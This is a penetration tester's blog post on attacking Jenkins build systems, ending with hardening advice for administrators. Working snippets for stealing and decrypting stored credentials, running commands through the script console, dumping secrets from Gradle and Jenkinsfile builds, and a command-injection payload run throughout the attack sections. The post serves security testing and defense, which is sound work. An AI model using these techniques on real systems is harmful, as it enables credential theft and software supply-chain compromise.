During the last few years I pentested many build systems and their corresponding infrastructures with build schedulers. By far most of them were built around Jenkins. I decided to write down my experience and share common security problems I encountered over the years. None of what I am about to write is new; most of it is scattered around many useful blogs or snippets on the Internet. The added value of this post is that you can take the table of contents as a checklist. In case you encounter Jenkins for the first time during a pentest or any kind of sec engagement, you will get a good idea of what to look for. If you are a Jenkins admin, reading this should give you a good idea of what to secure and why.
The next section holds some truths about build systems in general, along with some mitigation suggestions. In case you are interested in the “Attacking Jenkins” part, jump right to the Credentials section and read on from there.
Typical build jobs pull code from source code management systems (SCM) like GitHub or GitLab and build it on a build scheduler like Jenkins. While it is best practice to build on separate build nodes, the access to other components in the infrastructure and the “build scheduling” itself are managed on the master node. When the build job is done, there might be some feedback to the issue tracking system, or a successful build might result in a merge to the master branch, for example as an action on a successful pull request. Afterwards, the binary artifacts are pushed to test landscapes and, at some point, directly to production landscapes or the software store of your choice.
Looking at the infrastructure diagram above, the attacker's goal might be just stealing source code, but the most valuable data usually sits in production environments. The main threat is that backdoored software gets delivered to landscapes with customers' systems, or at least their data. To get there, one could simply attack the tenants' systems directly. You might get one, and in the case of cloud environments you might be successful with the same approach across multiple landscapes. However, depending on the deployment scenario, that attack might be complicated and cumbersome. So, why not just attack the build landscape, compromise the software there and let the software vendor take care of distribution to all tenants, right?
One can attack the SCM, the developers or the binary repositories, e.g., those for first- or third-party libraries or for storing build artifacts. Targeting developers might be very hard or very easy, depending on where you come from. Still, they might only have access to certain repos. Attacking the binary repositories or the SCM is a better idea. The downside of the latter is that somebody might notice changes in code or commits. Although this article focuses on the build scheduler, devs are still part of the threat model. If a user gets compromised, the attacker might commit malicious code. Developers have access to parts of the code, the tests and the makefiles. This means they do not just build code, they execute it on your build systems. Therefore, it is best practice to execute builds on separate build nodes. Depending on how many developers you have (10 vs 1000), you should consider build nodes compromised by design. In the default setup Jenkins builds all jobs with the same UID. This is why I am a huge fan of spinning up ephemeral nodes per build, e.g., Kubernetes pods, containers or EC2 spot instances. This is not only about the “fired and disgruntled employee” scenario, but also about the likelihood of compromised client devices and phished employees.
There is also an arrow in the illustration above that we have not talked about yet: the “Build Job Management” between the build scheduler and the devs. This role should not be your build job administrator! Compromising one user can lead to partial compromise of code or some build nodes; compromise of a Jenkins admin means they can take it all. In case your dev and admin team consists of a handful of people who are responsible for all tasks, this is not a relevant scenario for you. Otherwise, you are doing it wrong and you should ensure that devs can only access their build logs and maybe trigger jobs (if that is not automatically taken care of by your SCM).
This means applying least privilege on the source code, the SCM (on organization and/or repo level) and especially on the Jenkins level. The remaining threat model focuses on an attacker with network access to the build nodes and, the by far more interesting component, the master node. The latter holds all credentials to the rest of the infrastructure. This post will focus on common mistakes made by administrators and how to exploit them. Besides that, a common problem is credentials in public code repositories. It is not only about gitlab.com, github.com and others: especially inside internal SCMs there are large amounts of public repos and credentials to be found.
This is an important attack vector that I often see overlooked by pentesters - a gold mine for credentials.
It comes down to proper access controls and the implementation of least privilege principles. But none of that helps you when your patch management process is nonexistent: unpatched vulnerabilities lead to a similar outcome.
In the following sections I will discuss what to look for when you find yourself attacking a Jenkins landscape, which common errors I have found in the past and how to exploit them.
The credentials are stored inside the credentials.xml file in the $JENKINS_HOME directory (default is /var/lib/jenkins). The secret fields are always symmetrically encrypted. However, this is not meant as a protection; it is rather a best practice to avoid storing them in cleartext files or to separate them from conventional backups. The key material also resides inside $JENKINS_HOME. You can decrypt all credentials as soon as you have access to the following files.
master.key decrypts hudson.util.Secret, which in turn can decrypt the secrets from the credentials.xml. You will find loads of decryption scripts on GitHub. What I have been using most of the time is thesubtlety's Ruby script. In early v2 and/or Jenkins v1, the crypto routine was slightly different: use one of the alternative hacky scripts. In most of the scripts you will have to adjust the XML parsing parts to catch all types of credentials.
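As a minimal sketch, assuming you already have file system access on the master and the default paths are in use, collecting everything needed for offline decryption boils down to three files:

# Grab the key material and the encrypted credentials for offline decryption.
JENKINS_HOME=/var/lib/jenkins
tar czf loot.tgz \
    "$JENKINS_HOME/credentials.xml" \
    "$JENKINS_HOME/secrets/master.key" \
    "$JENKINS_HOME/secrets/hudson.util.Secret"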
It is possible to set up Jenkins build agents from the master node, and I found it to be a popular pattern. On Windows this works via WMI and on GNU/Linux via SSH. In both cases you will find the creds in the credentials.xml, or sometimes in the ~/.ssh/ folder. Since credential management is cumbersome, the common pattern is to use one account for the whole infrastructure. In any case, you will find the credentials on the master node.
Jenkins creates an API token for every user, to be used in automation scenarios utilizing the CLI or the REST API. Besides the bcrypt password hash of the respective user, the file $JENKINS_HOME/users/$USERNAME/config.xml also stores their API token, symmetrically encrypted in the same manner. As soon as you have local access to the master's file system, you would rather go for the global credentials directly. This scenario makes more sense if you found an API token in public code repos or some other source. People tend to commit their tokens in automation scripts wrapped around curl and underestimate their power. The impact heavily depends on the permissions of the user.
The API tokens are used for Basic Authentication. However, Jenkins does not return a 401 HTTP status, so your browser will not prompt an authentication pop-up like you are used to. Instead, you will have to pass the corresponding header explicitly! My weapon of choice here is appending the header to every request in Burp Suite (base64 encode $username:$apitoken). After reloading the site, you should be logged in as the corresponding user. If that worked, you should jump to the section Lax User Permissions.
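Outside of Burp, a quick sanity check with curl works just as well (a sketch; $JENKINS_HOST, $USER and $APITOKEN are placeholders for your target and loot). The whoAmI endpoint reflects the identity Jenkins associates with your request:

# Basic Auth is simply username:apitoken.
curl -s -u "$USER:$APITOKEN" "$JENKINS_HOST/whoAmI/api/json"
# Equivalent with an explicit Authorization header:
curl -s -H "Authorization: Basic $(printf '%s' "$USER:$APITOKEN" | base64)" "$JENKINS_HOST/whoAmI/api/json"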
Note that since v2.129 the token generation must be triggered by the user in their profile configuration. Furthermore, the tokens are not just encrypted anymore, they are also hashed. In case the Jenkins instance was upgraded from a previous version, admins have to migrate them though. I never found the config.xml files without the credentials.xml lying around as well, but it is useful to know in case you stumble upon backups or wonder why your setup is not working.
Build outputs are a gold mine. Jenkins masks known credentials with * characters to prevent accidental disclosure. However, a lot of custom Bash scripts run with the “set -x” debugging option, and I often see users store their credentials in their own build scripts or environment variables. At worst, you will still learn things relevant for reconnaissance. If you happen to run into large Jenkins instances, it helped me to scrape all build job names, add them to a wordlist, and then throw them into Burp's Intruder: $JENKINS_HOST/job/$JOBNAME/1/consoleText. Afterwards, grep for password fields in the HTTP responses.
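The same idea can be scripted outside of Burp; a rough sketch, assuming jq is installed and the jobs are not nested in folders:

# Enumerate job names via the JSON API (-g stops curl from globbing the brackets),
# then grep each job's first build log for interesting strings.
curl -sg -u "$USER:$APITOKEN" "$JENKINS_HOST/api/json?tree=jobs[name]" \
    | jq -r '.jobs[].name' > jobs.txt
while read -r job; do
    curl -s -u "$USER:$APITOKEN" "$JENKINS_HOST/job/$job/1/consoleText" \
        | grep -iE 'passw|secret|token' | sed "s|^|[$job] |"
done < jobs.txt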
You can look up $JENKINS_HOST/env-vars.html to see which variables are available globally. Finding these in the respective build jobs might help you with further recon, but will not get you far. I often found environment variables in the build output, either not removed after debugging or accidentally disclosed in scripts. The EnvInject plugin is not installed by default, but in case it is, the “Environment Variables” button discloses all environment variables of a particular build (you have to go to the specific build, not just the build project).
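Both lookups can be done with curl, too (a sketch; the injectedEnvVars path is only present when EnvInject is installed):

# Globally available variables:
curl -s "$JENKINS_HOST/env-vars.html"
# Per-build environment exposed by the EnvInject plugin:
curl -s -u "$USER:$APITOKEN" "$JENKINS_HOST/job/$JOBNAME/1/injectedEnvVars/api/json"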
I often find the access management to be very lax. The “Security” plugin, which is installed by default, lets one control the permissions in different ways. It is, ironically, possible to deactivate the “Security” check mark, in which case every visitor is automatically admin. I found this a couple of times, but more often one sees that the admins simply do not realize which permissions are critical. Once the user base gets bigger, I usually encounter the matrix-based permission model.
In nearly every case I see that anonymous or logged-in users are able to trigger arbitrary builds and see their output. This is less dangerous than editing permissions (how to exploit those is described later in this section). Still, it can be useful to dig into the jobs' build outputs, and adjusting the build parameters can get you far, too. The ability to create and configure builds is usually as useful to an attacker as admin permissions.
I also find it very common that additional plugins for grouping jobs are used. This enables the administrators to arrange permissions per group. At the same time, access management gets even more complicated. Obviously, the attacker's jackpot is to find themselves as a privileged anonymous or logged-in user. However, credentials gathered from other sources like public repos can also get you in.
As soon as you are in the UI, you should check whether you see the “Manage Jenkins” button in the navigation bar. If yes, either the admin unchecked “Enable security”, they misconfigured the authorization matrix, or you dug up admin credentials somewhere else. Anyway, you are admin, and the first thing you should do is go to the $JENKINS_HOST/script URL. This is a Groovy/Java console which executes code in the context of the affected Jenkins instance. Metasploit has a module to exploit this; I find it easier to dump the credentials by hand with a couple of lines of code.
// Execute any commands in local context.
'id'.execute().text
// Identify the $JENKINS_HOME. If getAbsolutePath()
// does not work out, try investigating 'ps faux'.
absolute_path = new File('.').getAbsolutePath()
println(new File(absolute_path + '/credentials.xml').text)
// Use the onboard API to decrypt the encrypted
// fields from the credentials.xml.
passwd = hudson.util.Secret.decrypt('{AQAAABAAAAAQbwWbc2MXnv8mte1/Ij6VysBTbBBA/QowALdl72x52ng=}')
// Get a reverse shell with execute() or
// dump the relevant files directly.
println(new File('/var/lib/jenkins/secrets/hudson.util.Secret').text.bytes.encodeBase64().toString())
There are also ways to talk to the script console via curl or, should you have a use case for that, to open the script console on build nodes via “Manage Jenkins” -> “Manage Nodes”. See the Jenkins docs for more details.
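A minimal sketch of the curl variant against the scriptText endpoint (when authenticating with an API token, no CSRF crumb should be required):

# Execute Groovy on the master non-interactively; the output comes back in the response body.
curl -s -u "$USER:$APITOKEN" \
    --data-urlencode "script=println('id'.execute().text)" \
    "$JENKINS_HOST/scriptText"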
The ability to create or edit build jobs gives code execution, depending on the config even on the master node. In case you do not have admin permissions but you see “New Item” in the navigation bar, simply create one to run your code - it is pretty much the intended functionality. The most straightforward way is to create a “Freestyle project”. As depicted in the following illustration, scroll down to the “Build” section and create an “Execute shell” build step. There you can probe around the file system, or get a (reverse) shell directly. Since build jobs often kill the shell right after execution, a sleep helps the job remain in execution state.
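The build step itself can be as minimal as this sketch; adjust to taste:

# Contents of the "Execute shell" build step:
id; hostname; uname -a
# Keep the executor (and any backgrounded shell) alive while you work:
sleep 3600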
In case you do not see the “New Item” button, click on the build jobs and look for the “Configure” button in the navigation bar. I found this to be a common mistake, for the reasons described in Lax User Permissions. Therefore, it is worth spending time investigating all, or at least most, of the jobs you see on the Jenkins instance. I believe Nikhil was the first one to document this publicly.
As a side note: in case you find yourself in a busy build environment and/or the executors on the build nodes are limited (admins can configure how many build jobs run simultaneously), jamming the build queues is a common reason to get detected. Do your task and get out of there.
I also encounter central build services in corporations, which develop libraries for the Jenkinsfile (read the Jenkins docs for details), templates and other predefined functionality to cover common build and deployment scenarios. Like in all code, you should look for vulnerabilities. How you can exploit them depends on your permissions and, of course, on the template/library you are attacking. If you can build jobs, command injection is your best friend. Having influence on hostnames that get “curl-ed” can be very powerful in case credentials are attached in an HTTP header.
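To illustrate, here is a hypothetical shared-library step (not taken from any real code base) where a user-controlled parameter ends up in a Groovy-interpolated sh call:

// vars/healthCheck.groovy - a hypothetical, vulnerable library step.
// 'host' comes straight from a user-supplied build parameter.
def call(String host) {
    withCredentials([string(credentialsId: 'service-token', variable: 'TOKEN')]) {
        // \$TOKEN is expanded by the shell, but ${host} is pasted in by
        // Groovy, unquoted and unvalidated - a command injection sink.
        sh "curl -H \"auth: \$TOKEN\" https://${host}/status"
    }
}
// A build parameter like:  example.com/;env|base64;true
// turns the "health check" into arbitrary command execution.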
A common permission setting I encounter is that anonymous or logged-in users cannot edit anything, but are able to trigger the build jobs. This is often tied to custom parameters; look for the “Build with Parameters” button inside the jobs. This is an underestimated attack surface.
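Triggering such a job does not require the UI; a quick sketch with curl ($JOBNAME and the parameter name TARGET are placeholders):

# Parameters are passed as ordinary POST/query fields to buildWithParameters.
curl -s -u "$USER:$APITOKEN" -X POST \
    "$JENKINS_HOST/job/$JOBNAME/buildWithParameters?TARGET=attacker.example.com"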
Build schedulers usually execute code that is outside the administrator's control by design. The threat model here is that developers with write access to code can execute anything they want on the build nodes and thereby access the credentials used in the particular build job. The following snippet is just a simple Gradle task that dumps all environment variables. The base64 encoding is needed since Jenkins masks known credentials in the build output.
defaultTasks 'run'
task run {
doLast {
System.getenv().each { k, v -> println "KEY: ${k}, VALUE: ${v}".bytes.encodeBase64().toString() }
}
}
If building on the master node is not turned off, one can simply cat the credentials.xml and the corresponding keys into the build job output.
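In that case, an “Execute shell” build step like this sketch is all it takes; base64 both defeats the credential masking and keeps the binary key file intact in the log:

# Runs on the master, so $JENKINS_HOME points at the real thing:
base64 "$JENKINS_HOME/credentials.xml"
base64 "$JENKINS_HOME/secrets/master.key"
base64 "$JENKINS_HOME/secrets/hudson.util.Secret"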
Jenkins does not only provide an easy-to-use UI, it also lets you define your whole build pipeline as code. The Jenkinsfile is very powerful and gives you the ability to do everything you can do in the UI with a Groovy-based DSL. I will focus on the credential handling here, but you should read the Jenkins docs in case you encounter this scenario.
stage('Creds Dump') {
steps {
withCredentials([string(credentialsId: 'MYCREDS', variable: 'AUTHTOKEN')]) {
sh '''
curl -H "auth:$AUTHTOKEN" https://someservice/
'''
}
}
}
The code snippet above accesses the secret MYCREDS from the Jenkins credential storage and makes it usable within the “withCredentials” block as the environment variable $AUTHTOKEN. In case you can influence the Jenkinsfile, you can dump the credentials into the build output using echo (or exfiltrate them by other means). However, you must know the credential ID or at least the description text defined in Jenkins' credential storage. An easier way is to iterate over all credentials the provider holds. Andrzej Rehmann wrote a detailed blog post on dumping credentials from within the Jenkinsfile. The following snippet lets you do that and is solely based on his work. Do not forget the base64 encoding to prevent known passwords from being masked in the build output.
def creds = com.cloudbees.plugins.credentials.CredentialsProvider.lookupCredentials(
com.cloudbees.plugins.credentials.common.StandardUsernameCredentials.class,
Jenkins.instance,
null,
null
);
for (c in creds) {
println( ( c.properties.privateKeySource ? "ID: " + c.id + ", UserName: " + c.username + ", Private Key: " + c.getPrivateKey() : "").bytes.encodeBase64().toString())
}
for (c in creds) {
println( ( c.properties.password ? "ID: " + c.id + ", UserName: " + c.username + ", Password: " + c.password : "").bytes.encodeBase64().toString())
}
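The job's console output then contains one base64 blob per credential; decoding is trivial (a sketch, assuming you saved the relevant output lines to console.txt):

# Decode each base64 line dumped by the loops above.
while read -r line; do printf '%s' "$line" | base64 -d; echo; done < console.txt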
If you can build code, you can execute code. If the administrators have done everything right, you can only execute it on build nodes. In this situation the Swarm plugin can aid an attacker in compromising the master node. The plugin enables build nodes to join the master instead of the other way around. This can make the deployment of new nodes more seamless; however, the nodes have to set themselves up on the Jenkins master. To do that, the Swarm client needs an API token for a privileged service user. The credentials are passed via the command line.
-password VAL : The Jenkins user password
-passwordEnvVariable VAL : Environment variable that the
password is stored in
-passwordFile VAL : File containing the Jenkins user password
The API token can be trivially found with ps faux | grep swarm-client.jar.
Please note, I do not hold a grudge against the plugin authors. As with the EnvInject plugin, I mention it here because I found it to be popular and, depending on your threat model, its usage can have a severe impact.
Running unpatched services seems like a typical case of negligence. Although I stand by that statement, I need to explain why I have seen more outdated Jenkins instances than any other software.
Jenkins is incredibly fragile, and I have only seen few landscapes handle it well. The native and third-party plugins basically give you a feature monster: you can cover every use case, and that is the reason for its popularity. But plugins break. They break regularly after updates, and this happens to most Jenkins admins I spoke to. The ones that developed their own custom plugins were looking for ways to drop them. The only effective patch management I saw came with high operational overhead and, where the unit's environment allowed it, with forcing pipeline code changes onto developers or admins. The latter is rare - nobody likes change.
The extended attack surface has obvious downsides; look through the changelogs and you will quickly understand what I mean. Imho, the Jenkins team has a great process for handling vulnerabilities. There is an announcement mailing list, the changelog is well documented, there are unit tests for the vulnerabilities, and the code documents them as well. This makes it possible to find the fixes, or at least the particular tests.
As for particular vulnerabilities that can bring you further during a security engagement:
For the metaprogramming bug, I will go into a little more detail in the rest of this section. It has to do with the URL routing of the underlying web framework. When calling the URL $JENKINS_HOST/adjuncts/whatever/class/classLoader/resource/index.jsp/content, the following code is called.
jenkins.model.Jenkins.getAdjuncts("whatever")
.getClass()
.getClassLoader()
.getResource("index.jsp")
.getContent()
Orange Tsai found code gadgets that can be reused to download external code and execute it, just by manipulating the URL. This gives you reliable code execution without any authentication. There are multiple exploits out there and some of them use slightly different bugs. The corresponding Metasploit module looks promising; I have been using the Python exploit by wetw0rk and 0xtavian multiple times. All that is needed is a valid username, which is considered public information: with Overall/Read permissions it can be retrieved through the “People” button in the Jenkins web UI. To fully understand the exploit, read the original blog posts by Orange, part 1 and part 2. The recording of his HITB talk is of great value, too.
All the discussed vulns are pretty old. As I mentioned at the beginning of this section, Jenkins is really hard to keep up to date, so I still find them to be relevant.
In case you are an admin, your first order of business should be reading through the Jenkins handbook chapters on Managing Security and Securing Jenkins. They cover a lot of the configuration I mentioned before and go far beyond that. I still want to point out some topics close to my heart.
Do proper threat modelling: include the developers in the big picture and treat build nodes as a hostile environment. Consider what developers can see and access by design (remember the Jenkinsfile section). Be aware of the risk.
Credential management concept: automation scenarios need to handle tons of secrets - unfortunately, centrally. When they get out, you are doomed. Prepare for failure and minimize the impact. Apply the least privilege principle to all service accounts. Why the hell does your AWS service account need IAM permissions to create other admin users for your landscape?
Do not build on the master: to my knowledge, one can only fully exclude the master node from builds by using additional plugins. Alternatively, you can still set the number of executors for the master node to zero. In case somebody tries to build there, you will see the job queued on the master forever (until deleted).
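Setting the executor count can also be scripted, e.g., via the script console or an init Groovy script (a minimal sketch):

import jenkins.model.Jenkins

// Disallow builds on the master/built-in node by removing its executors.
Jenkins.instance.setNumExecutors(0)
Jenkins.instance.save()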
Set permissions properly: think about which information developers can access. Decide who administers the Jenkins instance and who should have access to the credentials. Do your permission settings reflect that? For many past vulnerabilities the Overall/Read permission has been a requirement. Avoid exposing any information to anonymous users at all.
Patch! Patch like you have never patched before! I understand why so many people use Jenkins: I do not know any free or commercial product with that many features. In that sense it is a great tool, but you will need a lot of operational stamina. Decide early on whether you have it, or evaluate slimmer alternatives that are specific to your use case and/or workflow.
Props and thanks to @carloz_spicy for review.